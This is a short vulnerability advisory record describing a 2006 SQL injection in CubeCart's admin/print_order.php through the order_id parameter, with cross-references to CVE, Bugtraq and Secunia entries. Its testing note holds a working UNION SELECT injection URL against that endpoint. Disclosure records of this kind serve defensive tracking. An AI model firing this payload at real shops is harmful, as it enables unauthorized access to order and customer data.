CubeCart admin/print_order.php order_id Variable SQL Injection

2006-09-25T13:49:00
ID OSVDB:29245
Type osvdb
Reporter HACKERS PAL(security@soqor.net)
Modified 2006-09-25T13:49:00

Description

Manual Testing Notes

/admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

References:

Secunia Advisory ID:22175 Related OSVDB ID: 29243 Related OSVDB ID: 29242 Related OSVDB ID: 29317 Related OSVDB ID: 29244 Related OSVDB ID: 29246 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0422.html ISS X-Force ID: 29176 CVE-2006-5107 Bugtraq ID: 20215